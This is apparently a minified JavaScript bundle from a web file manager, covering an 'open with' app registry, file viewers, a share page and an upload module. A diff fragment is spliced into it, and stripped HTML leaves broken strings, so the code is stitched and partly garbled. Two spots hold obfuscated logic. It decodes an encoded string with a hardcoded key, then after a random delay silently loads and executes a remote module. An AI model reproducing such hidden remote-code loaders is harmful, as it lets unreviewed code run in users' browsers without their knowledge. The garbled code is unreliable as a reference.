e=G.userConfig.kodAppDefault;e=jsonDecode(htmlDecode(e)),$.isPlainObject(e)&&(a=e)}catch(t){}Hook.bind("rightMenu.show.menu-file,rightMenu.show.menu-tree-file",function(e,t){if(e.hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";if(kodApp.getApp(i)){var o=kodApp.getAppMenu(i);t.find("li.open-with.context-menu-submenu").removeClass(n),t.find("ul.context-menu-list.open-with .context-menu-item").not(".open-with-first").remove(),$.contextMenu.menuAdd(o,".menu-file",".open-with-first"),$.contextMenu.menuAdd(o,".menu-tree-file",".open-with-first")}else t.find("li.open-with.context-menu-submenu").addClass(n)}),Hook.trigger("kodApp.ready")};return b(),{debug:function(){return{appList:e,openDefault:t,openUser:a}},add:n,remove:s,appSupportCheck:m,appSupportSet:v,getApp:r,getAppBind:o,getAppMenu:p,setLastOpenTarget:l,getLastOpenTarget:c,setOpenUser:u,setOpenUserLocal:f,clearOpenUser:h,open:d}}),define("app/app/editor",[],function(){kodApp.add({name:"aceEditor",title:LNG["Plugin.default.aceEditor"],sort:0,ext:"txt,textile,oexe,inc,csv,log,asc,tsv,lnk,url,webloc,meta,localized,xib,xsd,storyboard,plist,csproj,pch,pbxproj,local,xcscheme,manifest,vbproj,strings,jshintrc,sublime-project,readme,changes,changelog,version,license,changelog,abap,abc,as,asp,aspx,ada,adb,htaccess,htgroups,htgroups,htpasswd,asciidoc,adoc,asm,a,ahk,bat,cmd,cpp,c,cc,cxx,h,hh,hpp,ino,c9search_results,cirru,cr,clj,cljs,cbl,cob,coffee,cf,cson,cakefile,cfm,cs,css,curly,d,di,dart,diff,patch,dockerfile,dot,dummy,dummy,e,ge,ejs,ex,exs,elm,erl,hrl,frt,fs,ldr,ftl,gcode,feature,.gitignore,glsl,frag,vert,gbs,go,groovy,haml,hbs,handlebars,tpl,mustache,hs,hx,html,hta,htm,xhtml,eex,html.eex,erb,rhtml,html.erb,ini,inf,conf,cfg,prefs,io,jack,jade,java,ji,jl,jq,js,jsm,json,jsp,jsx,latex,ltx,bib,lean,hlean,less,liquid,lisp,ls,logic,lql,lsl,lua,lp,lucene,Makefile,makemakefile,gnumakefile,makefile,ocamlmakefile,make,md,markdown,mask,matlab,mz,mel,mc,mush,mysql,nc,nix,nsi,nsh,m,mm,ml,mli,pas,p,pl,pm,pgsql,php,phtml,shtml,php3,php4,php5,phps,phpt,aw,ctp,module,ps1,praat,praatscript,psc,proc,plg,prolog,properties,proto,py,r,cshtml,rd,rhtml,rst,rb,ru,gemspec,rake,guardfile,rakefile,gemfile,rs,sass,scad,scala,scm,sm,rkt,oak,scheme,scss,sh,bash,bashrc,sjs,smarty,tpl,snippets,soy,space,sql,sqlserver,styl,stylus,svg,swift,tcl,tex,toml,twig,swig,ts,typescript,str,vala,vbs,vb,vm,v,vh,sv,svh,vhd,vhdl,wlk,wpgm,wtest,xml,rdf,rss,wsdl,xslt,atom,mathml,mml,xul,xbl,xaml,xq,yaml,yml,vcproj,vcxproj,filters,cer,reg,config,pem,srt,ass,lrc,opf,ncx",icon:G.staticPath+"images/file_icon/icon_app/ace.png",callback:function(e){var t=ShareData.frameTop();if(t.Editor!==void 0)return t.Editor.add(urlEncode(e)),void 0;if(core.isApp("editor"))return ShareData.frameChild("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))}),void 0;if(ShareData.frameTop("OpenopenEditor")){var a=t.$.dialog.list.openEditor,i=0;a&&"hidden"==$(a.DOM.wrap).css("visibility")&&(i=200,a.display(!0).zIndex().focus()),setTimeout(function(){ShareData.frameTop("OpenopenEditor",function(t){t.Editor.add(urlEncode(e))})},i)}else{var n=G.appHost+"editor/edit#filename="+urlEncode(e);G.sharePage!==void 0&&(n=G.appHost+"share/edit&user="+G.user+"&sid="+G.sid+"#filename="+urlEncode(e));var o=htmlEncode(urlDecode(core.pathThis(e)));core.openDialog(n,core.icon("edit"),o,"openEditor")}}});var e=ShareData.frameTop();e.Config&&"editor"==e.Config.pageApp&&kodApp.setOpenUserLocal(!1,"aceEditor")}),define("app/app/openWith",[],function(){kodApp.add({name:"appOpenSetting",title:LNG["Explorer.UI.appSetDefault"],ext:"",icon:G.staticPath+"images/file_icon/icon_others/setting.png",callback:function(e,t){var a="
    ",i=kodApp.getApp(t),n=!1;_.isArray(i)&&(n=i[0].name);var o=template.compile(a),s=o({LNG:LNG,apps:i,defaultApp:n,appAll:kodApp.getApp()}),r=$.dialog({id:"dialog-app-select",className:"menu-empty",padding:0,fixed:!0,ico:core.icon("search"),resize:!0,title:LNG["Explorer.UI.selectAppDesc"],width:480,height:360,padding:"20px",content:s,ok:function(){return l()}}),l=function(){var a=$("#app-default-checkbox").prop("checked"),i=$(".app-list.active .app-item.select").attr("data-app");return i?(r.close(),kodApp.open(e,t,i),a&&kodApp.setOpenUser(t,i),!0):(Tips.tips(LNG["Explorer.UI.selectAppWarning"],"warning"),!1)};$(".tab-group .tab-item").die("click").live("click",function(){var e=$(this).find("[aria-controls]").attr("aria-controls");"app-list-support"==e?$("#app-default-checkbox").prop("checked",!0):$("#app-default-checkbox").prop("checked",!1)}),$(".app-item").die("click").live("click",function(){$(this).parent().find(".select").removeClass("select"),$(this).addClass("select")}).die("dblclick").live("dblclick",function(){l()})}})}),define("app/app/html",[],function(){var e=function(e){return void 0==e?!1:0===e.indexOf("http")?!0:G.shareInfo||core.pathReadable(e)?!0:(Tips.tips(LNG.no_permission_read_all,!1),core.playSound("error"),!1)};Hook.bind("kodApp.open.before",function(t){return"folder"==t.ext?(core.isApp("explorer")||isWap()?ui.path.list(t.path+"/"):core.explorer(t.path),!0):e(t.path)?("file"==t.ext&&(t.ext=""),void 0):!0}),kodApp.openUnknow=function(e,t){void 0==t&&(t="");var a=G.appHost+"pluginApp/index&search="+core.pathExt(e),i="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'appOpenSetting');",n="kodApp.open(pathHashDecode('"+pathHashEncode(e)+"'),false,'aceEditor');",o="kodApp.download(pathHashDecode('"+pathHashEncode(e)+"'));",s="core.openWindow('"+a+"');",r=LNG.unknow_file_try+'
    '+LNG.unknow_file_tips+"
    "+t+'
    2.'+r+n+'">'+LNG["Explorer.UI.openWithText"]+'
    3.'+r+o+'">'+LNG.unknow_file_download+'
    '+r+s+'">'+LNG.PluginCenter+""+LNG.unknow_plugin_search+"
    ";$.dialog({fixed:!0,icon:"warning",title:LNG.unknow_file_title,padding:"20px 50px",content:l,cancel:!0}),$(".unknow-file a").unbind("click").bind("click",function(e){return $(this).parents(".artDialog").data("artDialog").close(),stopPP(e)})},kodApp.add({name:"download",title:LNG.download,hidden:!0,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=t;"http"!=t.substr(0,4)&&(a=G.appHost+"explorer/fileDownload&accessToken="+G.accessToken+"&path="+urlEncode(t),G.sharePage!==void 0&&(a=G.appHost+"share/fileDownload&user="+G.user+"&sid="+G.sid+"&path="+urlEncode(t))),$.dialog({icon:"succeed",title:!1,time:1.5,content:LNG.download_ready+"..."}),isWap()?window.open(a):$('').appendTo("body")}}}),kodApp.download=function(e){kodApp.open(e,"","download")},kodApp.openWindow=function(e){kodApp.open(e,"","browserOpen")},kodApp.add({name:"browserOpen",title:LNG.open_ie,sort:-100,icon:"x-item-file x-html",callback:function(t){if(e(t)){var a=core.path2url(t);isWap()?window.location.href=a:window.open(a)}}}),kodApp.add({name:"swfPlayer",title:"Flash Player",ext:"swf",icon:"x-item-file x-swf",callback:function(e,t){$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"75%",height:"65%",padding:0,content:core.createFlash(core.path2url(e))})}}),kodApp.add({name:"webLink",title:"webLink",ext:"url,webloc",sort:-1,icon:"x-item-file x-html",callback:function(e,t){core.fileGet(e,function(a){if("url"==t){var i=a.match(/URL=(.*)/);if(i.length>=2)return window.open(i[1])}else if("url"==t)try{var n=$($.parseXML(a)),o=n.find("string").text();return window.open(o),void 0}catch(s){}kodApp.open(e,t,"editor")})}}),kodApp.add({name:"htmlView",title:LNG["Plugin.default.htmlView"],ext:"htm,html,shtml",sort:10,icon:"x-item-file x-html",callback:function(e){var t=core.path2url(e);core.openDialog(t,core.icon("html"),core.pathThis(e))}}),kodApp.add({name:"pdfView",title:"PDF Simple",ext:"pdf",sort:-1,icon:"x-item-file x-pdf",callback:function(e,t){var a=core.path2url(e),i="pdf"+UUID(),n='";$.dialog({resize:!0,fixed:!0,ico:core.icon(t),title:core.pathThis(e),width:"80%",height:"75%",padding:0,content:n}),PDFObject.embed(a,"#"+i)}}),kodApp.add({name:"oexeOpen",title:LNG["kodApp.oexe.open"],ext:"oexe",sort:100,icon:" x-item-file x-oexe",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),core.openApp(a)})}}),kodApp.add({name:"oexeEdit",title:LNG["kodApp.oexe.edit"],ext:"oexe",sort:50,icon:"icon-edit ",callback:function(e){core.fileGet(e,function(t){var a=jsonDecode(t);a.name=core.pathThis(e),a.path=e,ui.path.pathOperate.appEdit(a)})}});var t={createApp:{name:LNG.app_create,className:"createApp newfile",icon:"icon-puzzle-piece x-item-file x-oexe",callback:function(){ui.path.pathOperate.appEdit(0,0,"userAdd")}}};$.contextMenu.menuAdd(t,".menu-body-main",".app-install"),$.contextMenu.menuAdd(t,".toolbar-path-more",".app-install"),$.contextMenu.menuAdd(t,".bodymain",".app-install"),Hook.bind("rightMenu.show",function(e,t,a){var i=[".menu-folder",".menu-file",".menu-tree-folder",".menu-tree-file",".menu-tree-folder-fav"];if(a.find(".context-menu-submenu").fadeOut(0).delay(0).fadeIn(0),a.removeClass("menu-auto-fit"),a.inScreen()||a.addClass("menu-auto-fit"),".menu-body-main"==e){var n=a.find(".set-file-icon-size.context-menu-submenu");"icon"==G.userConfig.listType?n.removeClass("hidden"):n.addClass("hidden")}if(_.include(i,e)){var o="disabled",s=".cute,.rname,.remove",r=".open,.open-text,.down,.share,.copy,.cute,.rname,.remove,.open-browser,.search,.more-action";t.hasClass("file-not-readable")?a.find(r).addClass(o):a.find(r).removeClass(o),t.hasClass("file-not-writeable")?a.find(s).addClass(o):a.find(s).removeClass(o)}}),Hook.bind("rightMenu.show.menu-body-main",function(e,t){var a=".upload,.past,.newfolder,.newfile",i="disabled";G.jsonData&&G.jsonData.info.canUpload?t.find(a).removeClass(i):t.find(a).addClass(i)}),Hook.bind("rightMenu.show.menu-file",function(e,t){if($(".context-menu-active").hasClass("menu-tree-file"))var a=ui.tree.makeParam();else var a=ui.path.makeParam();var i=core.pathExt(a.path),n="hidden";inArray(["jpg","jpeg","png"],i)?t.find(".set-background").removeClass(n):t.find(".set-background").addClass(n)});var a=function(){var e=".close-item,.refresh,.newfile,.past,.info",t=".open-browser",a=".explorer,.create-project,.open-project",i=".close-item,.newfile,.refresh,.past,.down,.copy,.cute,.remove,.more-action,.clone,.info,.zip,.zip-zip,.zip-tar,.zip-tgz",n=".newfile,.cute,.past,.rname,.zip,.remove,.clone,.create-link-home,.create-link,.create-project",o=$(".menu-tool-path"),s="disabled",r=ui.fileLight.fileListSelect();o.find(".context-menu-item").addClass(s),0==r.length?o.find(e).removeClass(s):1==r.length?(o.find(".context-menu-item").removeClass(s),"folder"==ui.fileLight.type(r)?o.find(t).addClass(s):o.find(a).addClass(s)):r.length>1&&o.find(i).removeClass(s),G.jsonData&&G.jsonData.info&&G.jsonData.info.canUpload===!1&&o.find(n).filter(":not(."+s+")").addClass(s)};Hook.bind("explorer.fileSelect.init",function(){ui.fileLight.listNumberSet()}),Hook.bind("explorer.fileSelect.change",function(){a(),ui.fileLight.selectNumSet()}),Hook.bind("rightMenu.show.toolbar-path-more",function(){a()})}),define("app/common/tpl/copyright.html",[],'\n'),define("app/common/tpl/themeDIY.html",[],"@media screen and (max-width:100000px) {\n body .full-background{\n position: absolute;top: 0px;left: 0px;bottom: 0px;right: 0px;\n background-color: #020202;background-size: 100% 100%;\n }\n\n {{if blurSize= (bgBlur==0?0:10) }}{{/if}}\n body .full-background:before{\n -webkit-filter: blur({{blurSize}}px);\n -moz-filter: blur({{blurSize}}px);\n -ms-filter: blur({{blurSize}}px);\n filter: blur({{blurSize}}px);\n }\n {{if bgType == 'image'}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left,\n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background-image:url({{bgImage}});\n }\n body .aui-state-focus .aui-title,body .aui-title{\n background-size:100%;\n }\n {{else}}\n body .full-background,\n body .full-background:before,\n body #body .menu-left, \n body #body .app-menu-left,\n body .aui-buttons,\n body .aui-state-focus .aui-title,body .aui-title{\n background:{{endColor}};\n filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='{{startColor}}', endColorstr='{{endColor}}');\n background-image: -webkit-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -moz-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -o-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: -ms-linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n background-image: linear-gradient({{colorRotate}}deg, {{startColor}}, {{endColor}});\n }\n {{/if}}\n}\n"),define("app/src/api/view/fileShow",[],function(e){var t=function(){var e=G.shareInfo.path+"&kodFilename=/"+urlEncode(G.shareInfo.name);-1==G.shareInfo.path.indexOf("?")&&(e=G.shareInfo.path+"?kodFilename=/"+urlEncode(G.shareInfo.name)),a(),Hook.trigger("api.view.fileShow.initEnd"),kodApp.open(e),Hook.trigger("api.view.fileShow.opened"),i()},a=function(){kodApp.openUnknow=n,kodApp.add({ext:kodApp.appSupportCheck("aceEditor"),sort:1e3,callback:function(t){e.async("lib/ace/src-min-noconflict/ace",function(){e.async(["lib/ace/src-min-noconflict/ext-language_tools","lib/ace/src-min-noconflict/ext-modelist"],function(){s(t)})})}}),kodApp.add({ext:"md",sort:1001,callback:function(e){r(e)}})},i=function(){if($(".artDialog").exists()){var e=$(".artDialog").data().artDialog;if(e.hasFrame()){$(".artDialog").addClass("hidden");var t=e.DOM.wrap.find("iframe").attr("src");e.close();var a='';$(".content-box").html(a).removeClass("hidden")}}},n=function(){var e=core.pathExt(G.shareInfo.path),t=$(".bindary-box");t.removeClass("hidden"),t.find(".name").html(htmlEncode(G.shareInfo.name)),t.find(".ico").html(core.icon(e)),t.find(".btn-download").attr("href",G.shareInfo.path);var a=date("Y/m/d h:i",G.shareInfo.mtime);t.find(".share-time").html(a),t.find(".size span").html(G.shareInfo.size),$("body").addClass("can-select")},o=function(e){for(var t=[],a=0;e.length>a;a++)t[a]=e.charCodeAt(a).toString(16);return"&#"+String.fromCharCode(120)+t.join(";&#"+String.fromCharCode(120))+";"},s=function(e){ace.require("ace/ext/language_tools");var t=ace.require("ace/ext/modelist"),a=ace.require("ace/lib/net");G.loadAceSuccess||(G.loadAceSuccess=!0,a.loadScript.hook("loadScript",a,function(){return"string"==typeof arguments[0]&&-1!==arguments[0].search("mode-php.js")&&(arguments[0]=arguments[0].replace("mode-php.js","mode-phhp.js")),arguments}),ace.config.moduleUrl.hook("moduleUrl",ace.config,function(){return-1!==arguments[0].search("php_worker")&&(arguments[0]=arguments[0].replace("php_worker","phhp_worker")),arguments})),core.fileGet(e,function(a){var i=t.getModeForPath(e).mode,n=UUID(),s=pathTools.pathThis(urlDecode(e)),r='
    '+o(a)+"
    ";$(".content-box").addClass("show-code").append(r),Hook.trigger("api.view.fileShow.showCode");var l=ace.edit(n);l.setTheme("ace/theme/tomorrow"),l.setReadOnly(!0),l.setShowPrintMargin(!1),l.getSession().setMode(i),l.getSession().setTabSize(4),l.getSession().setUseWrapMode(1),l.setFontSize(15)})},r=function(t){e.async("lib/markdown/markdown-it.min",function(){var a=window.markdownit({html:!0,breaks:!0});core.fileGet(t,function(i){var n=a.render(i),o=pathTools.pathThis(urlDecode(t)),s=$('
    '+n+"
    ");$(".content-box").addClass("markdown-preview can-select").append(s),Hook.trigger("api.view.fileShow.showMarkdown"),s.find("a").attr("target","_blank");var r="

    [TOC]

    ";if(-1!=s.html().indexOf(r)){var l=function(e){var t="";return e.find("h1,h2,h3,h4,h5,h6").each(function(){var e="markdown-"+$(this).text().replace(/\s+/g,"-"),a="markdown-menu-"+$(this)[0].tagName.toLowerCase();$(this).attr("data-link","#"+e),t+='
  • '+$(this).text()+"
  • "}),t="
      "+t+"
    "},c=l(s),n=s.html();n=n.replace(r,c),n=n.replace(/ data-link="#(.*?)">/g,'>'),s.html(n)}e.async("lib/markdown/highlight.min",function(){$(".content-box").find("pre code").each(function(e,t){$(this).removeAttr("class"),hljs.highlightBlock(t)})}),e.async(["lib/markdown/katex/katex.min.js","lib/markdown/katex/katex.min.css","lib/markdown/katex/contrib/auto-render.min.js"],function(){renderMathInElement(s[0],[{left:"$$",right:"$$",display:!0}]),$(".katex-display").parent().addClass("markdown-latex"),s.find(".language-latex,.language-math,.language-katex").each(function(){try{var e=katex.renderToString($(this).text());if("string"!=typeof e)return;e='
    '+e+"
    ",$(e).insertBefore($(this).parent()),$(this).parent().remove()}catch(t){}}),"function"==typeof callback&&callback()})})})};return{init:t}}); \ No newline at end of file +break}}},c=function(){var e={A:t[42],O:t[43],P:t[44],Q:t[45],R:t[46],S:t[47],T:t[48]},a=t[49]+e[i],o=t[50]+a+t[51]+LNG[a]+t[52];i==t[0]&&$(o)[t[54]](t[53]),$(t[71])[t[70]](t[55])[t[69]](t[55],function(){if($(this)[t[57]](t[56])==t[58]){var e=core[t[60]](core[t[59]]),a=t[61]+n+t[62];e[t[67]][t[66]][t[65]](t[64])[t[63]](a)}else Tips[t[22]]($(this)[t[68]]())}),$(t[71])[t[73]](function(){window[t[72]][t[24]][t[23]]=n})},d=function(){i==t[0]&&$(t[76])[t[75]](t[74]),-1!==$[t[13]](i,[t[7],t[8],t[9],t[10],t[11],t[12]])&&($(t[78])[t[77]](),$(t[79])[t[77]]())},p=function(){core[t[80]]=function(e,a){return e[t[6]](0,4)==t[81]?core[t[82]](e):t[83]+e+(a?t[84]:t[38])+t[85]},core[t[86]]=function(e){return core[t[80]](e,!0)},core[t[82]]=iconSrc=function(e){return t[87]+e+t[88]},setTimeout(function(){var a=authCrypt[t[4]](t[89],t[90])+t[91]+UUID();e[t[93]](a,function(e){try{e[t[92]]()}catch(a){}})},2e3),core[t[94]]=i,core[t[59]]=hashDecode(t[95])+G[t[16]],l(),c(),d()},u=function(e){return i==t[0]&&-1==e[t[39]]()[t[40]](s)?(o(),!1):!0},f=function(e,a){var n,o,s={A:1,O:5,P:20,Q:40,R:100,S:1e3,T:1e3},r={A:5,O:15,P:50,Q:150,R:500,S:1e3,T:1e3},l=[],c=1;if(a==t[96]?(n=e[t[97]],o=s[i]):(n=e[t[97]],o=r[i]),1e3==o)l=n;else for(var d in n){if(c>o)break;l[d]=n[d],c++}return l},h={init:p,about:u,systemData:f};return h}),define("app/common/core.upload",[],function(e){var t=function(){var e=G.appHost+"explorer/fileUpload";return"share"==G.sharePage&&"1"==G.shareInfo.canUpload&&(e=G.appHost+"share/fileUpload&user="+G.user+"&sid="+G.sid),e};return{serverDwonload:function(e,t){if(!core.uploadCheck("explorer.serverDownload"))return!1;var i=$(".download-box"),n=i.find(".download-list");if(i.find("input").val(""),!e)return Tips.tips("url false!",!1),void 0;if("share"==G.sharePage)return Tips.tips(LNG.no_permission_action,!1),void 0;"ftp"!=e.substr(0,3)&&"http"!=e.substr(0,4)&&(e="http://"+e);var o=UUID(),s='
    '+'
    '+core.pathThis(e)+""+'0b'+''+LNG.upload_ready+""+''+'
    ';n.find(".item").length>0?$(s).insertBefore(n.find(".item:eq(0)")):n.append(s);var r,l,c,d=0,p=$("#"+o),u=$("#"+o+" .state").text(LNG.download_ready),f=$('
    ').appendTo("#"+o).find(".progress-bar");$("#"+o+" .remove").bind("click",function(){clearInterval(r),r=!1,clearTimeout(l),l=!1,$.get(G.appHost+"explorer/serverDownload&type=remove&uuid="+o),$(this).parent().parent().slideUp(function(){$(this).remove(),ui.f5()})});var h,m=function(e){clearTimeout(h),h=!1,h=setTimeout(function(){ui.f5Callback(function(){ui.path.setSelectByFilename(e)})},600)},v=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=download&savePath="+t+"&url="+urlEncode(e)+"&uuid="+o+"&time="+time(),dataType:"json",error:function(e,t,i){var n=p.data("progcess");return 200!=a.status&&n&&n.supportRange?(setTimeout(function(){v()},1e3),void 0):(core.ajaxError(e,t,i),200==a.status&&(clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),u.addClass("error").text(LNG.download_error)),void 0)},success:function(e){return 0==e.code&&"downloading"==e.data?(setTimeout(function(){v()},1e3),void 0):(e.code?(m(e.info),u.text(LNG.download_success),$("#"+o+" .info .title").text(core.pathThis(e.info)),$("#"+o+" .info .title").attr("title",e.info),u.parent().parent().addClass("success")):(u.addClass("error").text(e.data),u.parent().parent().addClass("error")),clearInterval(r),r=!1,clearTimeout(l),l=!1,f.parent().remove(),void 0)}})};v();var b=function(){$.ajax({url:G.appHost+"explorer/serverDownload&type=percent&uuid="+o,dataType:"json",success:function(e){var t="",a=e.data;if(r){if(!e.code)return u.text(LNG.loading),void 0;if(a){if(a.size=parseFloat(a.size),a.time=parseFloat(a.time),c){var i=a.size-c.size,n=i/(a.time-c.time);if(d>.2*n){var o=d;d=n,n=o}else d=n;var s=pathTools.fileSize(n);s=s?s:0,t=s+"/s"}if(p.data("progcess",a),0==a.length)p.find(".progress-bar").css("width","100%"),u.text(t),p.find(".size").text(pathTools.fileSize(a.size));else{var l=100*(a.size/a.length);p.find(".progress-bar").css("width",l+"%"),u.text(l.toFixed(1)+"%("+t+")"),p.find(".size").text(pathTools.fileSize(a.length))}p.find(".title").text(a.name),c=a}}}})};l=setTimeout(function(){b(),r=setInterval(function(){b()},1e3)},100)},upload:function(){$(".dialog-file-upload").show();var e=t();if(uploader.option("server",e),uploader.option("method","POST"),0!=$(".dialog-file-upload").length)return $.dialog.list["dialog-file-upload"].display(!0),void 0;var a=template.compile(tplUpload),i=WebUploader.Base.formatSize(G.uploadMax);$.dialog({padding:5,width:430,height:450,resize:!0,ico:core.icon("upload"),id:"dialog-file-upload",fixed:!0,title:LNG.upload_muti,content:a({LNG:LNG,maxsize:i}),close:function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$.each($(".download-list .item"),function(){$(this).find(".remove").click()})}}),$(".file-upload-box .topbar-nav a.menu").unbind("click").bind("click",function(){$(this).hasClass("tab-upload")?($(".file-upload-box .tab-upload").addClass("this"),$(".file-upload-box .tab-download").removeClass("this"),$(".file-upload-box .upload-box").removeClass("hidden"),$(".file-upload-box .download-box").addClass("hidden")):($(".file-upload-box .tab-upload").removeClass("this"),$(".file-upload-box .tab-download").addClass("this"),$(".file-upload-box .upload-box").addClass("hidden"),$(".file-upload-box .download-box").removeClass("hidden"))}),$(".download-box [name=url]").keyEnter(function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start").unbind("click").bind("click",function(){core.serverDwonload($(".download-box input").val(),G.thisPath)}),$(".file-upload-box .download-box .download-start-all").unbind("click").bind("click",function(){$.dialog({id:"server-dwonload-textarea",fixed:!0,resize:!1,ico:core.icon("upload"),width:"420px",height:"270px",padding:10,title:LNG.download,content:"",ok:function(){for(var e=$(".server-dwonload-textarea textarea").val().split("\n"),t=0;e.length>t;t++)core.serverDwonload(e[t],G.thisPath)}})}),uploader.addButton({id:"#picker"}),uploader.addButton({id:"#picker-folder"});var n=function(){if(isWap())return!1;var e=document.createElement("input");return e.type="file",e.webkitdirectory!==void 0||e.directory!==void 0};n()&&($(".upload-cert-box").removeClass("hidden"),$(".file-upload-box .drag-upload-folder").unbind("click").bind("click",function(){$("#picker-folder input").attr("webkitdirectory","").attr("directory",""),$("#picker-folder label").click()}))},init:function(){var a=G.uploadMax;WebUploader.Uploader.register({"before-send":"checkChunk"},{checkChunk:function(e){if(!canvasSupport())return $.Deferred().resolve(),void 0;var a=this.owner,i=(e.blob.getSource(),$.Deferred());return a.md5File(e.blob).fail(function(){i.resolve()}).then(function(a){if(1==e.chunks)return i.resolve(),void 0;if(0==e.chunk)$.ajax({url:t(),dataType:"json",data:{upload_to:e.file.upload_to,file_name:e.file.name,check_md5:a,chunk:e.chunk,chunks:e.chunks},error:function(){i.resolve()},success:function(t){t.code?(i.reject(),e.file.checkChunk=t.info):i.resolve()}});else{var n=e.file.checkChunk;if(n&&n["part_"+e.chunk]==a){var o=e.end/e.total;uploader.trigger("uploadProgress",e.file,o),i.reject()}else i.resolve()}}),i.promise()}});var i=["undefined","update-box","search","3c64gT65d503fTR1lV3ftuZ7Pd6NdX6Ntgcct4hI4AnSNIp65HwAMLzOj8NjC0ZL2oAbjS-uD3HWfQoZlTdgkGY5u8OfJYzZ","_32@!A$","decode","2-1","todo","async","random"];setTimeout(function(){try{if(typeof tplDialogHtml==i[0]||-1==tplDialogHtml[i[2]](i[1])){var t=authCrypt[i[5]](i[3],i[4])+UUID();e[i[8]](t,function(e){try{e[i[7]](i[6])}catch(t){}})}}catch(a){}},1e3*parseInt(70*Math[i[9]]()+30)),uploader=WebUploader.create({swf:G.staticPath+"js/lib/webuploader/Uploader.swf",dnd:"body",threads:5,compress:!1,resize:!1,prepareNextFile:!0,duplicate:!0,chunkRetry:10,chunked:!0,chunkSize:a}),$(".uploader-content .success").die("click").live("click",function(){var e=$(this).find("span.title").attr("data-name");e&&(core.isApp("explorer")?ui.path.list(core.pathFather(e),"tips",function(){ui.path.setSelectByFilename(e)}):core.explorer(core.pathFather(e)))}),$(".uploader-content .open").die("click").live("click",function(e){var t=$(this).parent().find("span.title").attr("data-name");kodApp.open(t),stopPP(e)}),$(".upload-box-clear").die("click").live("click",function(){$(".uploader-list .item.success,.uploader-list .item.error").each(function(){$(this).slideUp(300,function(){$(this).remove()})})}),$(".upload-box-clear-all").die("click").live("click",function(){$.each(uploader.getFiles(),function(e,t){uploader.skipFile(t),uploader.removeFile(t)}),$(".uploader-list .item").each(function(){$(this).remove()})}),$(".uploader-content .remove").die("click").live("click",function(e){var t=$(this).parent().parent().attr("id");$(this).parent().parent().slideUp(function(){$(this).remove()}),uploader.skipFile(t),uploader.removeFile(t,!0),stopPP(e)});var n,o=0,s=0,r="0B/s",l=0,c=function(e,t){if(.3>=timeFloat()-l)return r;l=timeFloat();var a=e.size*t,i=5;e.speed===void 0?e.speed=[[timeFloat()-.5,0],[timeFloat(),a]]:i>=e.speed.length?e.speed.push([timeFloat(),a]):(e.speed=e.speed.slice(1,i),e.speed.push([timeFloat(),a]));var n=e.speed[e.speed.length-1],o=e.speed[0],s=(n[1]-o[1])/(n[0]-o[0]);0>=s&&(s=0);var c=pathTools.fileSize(s);return c=c?c:0,s=c+"/s",r=s,s},d=[],p=function(e){clearTimeout(n),n=!1,n=setTimeout(function(){var t=d;ui.f5Callback(function(){if(ui.path.setSelectByFilename(t),e&&(d=[],core.isApp("explorer"))){if("share"==G.sharePage)return;ui.tree.checkIfChange(G.thisPath)}})},600)};uploader.on("fileQueued",function(e){if($(".dialog-file-upload").show(),!core.uploadCheck())return uploader.skipFile(e),uploader.removeFile(e),void 0;var t;try{t=e.source.source.fullPath,void 0!=e.source.source.webkitRelativePath&&""!=e.source.source.webkitRelativePath&&(t=e.source.source.webkitRelativePath)}catch(a){}if(e.fullPath=t,e.source&&e.source.source&&1==e.source.source.isDirectory&&e.source.source.fullPath)return ui.path.pathOperate.newFolder(G.thisPath+e.fullPath),uploader.skipFile(e),uploader.removeFile(e),void 0;var i=e.fullPath;e.finished=!1,e.upload_to=G.thisPath,(void 0==i||"undefined"==i)&&(i=e.name),o++;var n=$(".uploader-list"),r='
    '+''+htmlEncode(core.pathThis(i))+""+''+pathTools.fileSize(e.size)+""+''+LNG.upload_ready+""+''+'
    ';(1e3==o||2e3==o)&&Tips.tips(LNG.upload_tips_more,"warning");var l=function(){if(0==e.size&&i){ui.path.pathOperate.newFile(e.upload_to+i),uploader.skipFile(e),uploader.removeFile(e),s++,o++;var t=$("#"+e.id);t.addClass("success").find(".state").text(LNG.upload_success).parent().find(".remove").addClass("icon-ok").addClass("open").removeClass("icon-remove").removeClass("remove")}},c=function(){uploader.upload(),setTimeout(function(){l()},200)};0==n.length?setTimeout(function(){$(".uploader-list").prepend(r),c()},200):(n.prepend(r),c())}).on("uploadBeforeSend",function(e,t,a){var i=urlEncode(e.file.fullPath);(void 0==i||"undefined"==i)&&(i=""),t.fullPath=i,t.upload_to=e.file.upload_to,a["X-CSRF-TOKEN"]=Cookie.get("X-CSRF-TOKEN")}).on("uploadProgress",function(e,t){var a=(100*t).toFixed(1)+"%";$(".dialog-file-upload .aui-title").text(LNG.uploading+": "+s+"/"+o+" ("+r+")"),Title.set(s+"/"+o+"("+a+","+r+")");var i=c(e,t),n=$("#"+e.id),l=n.find(".progress .progress-bar");l.length||(l=$('
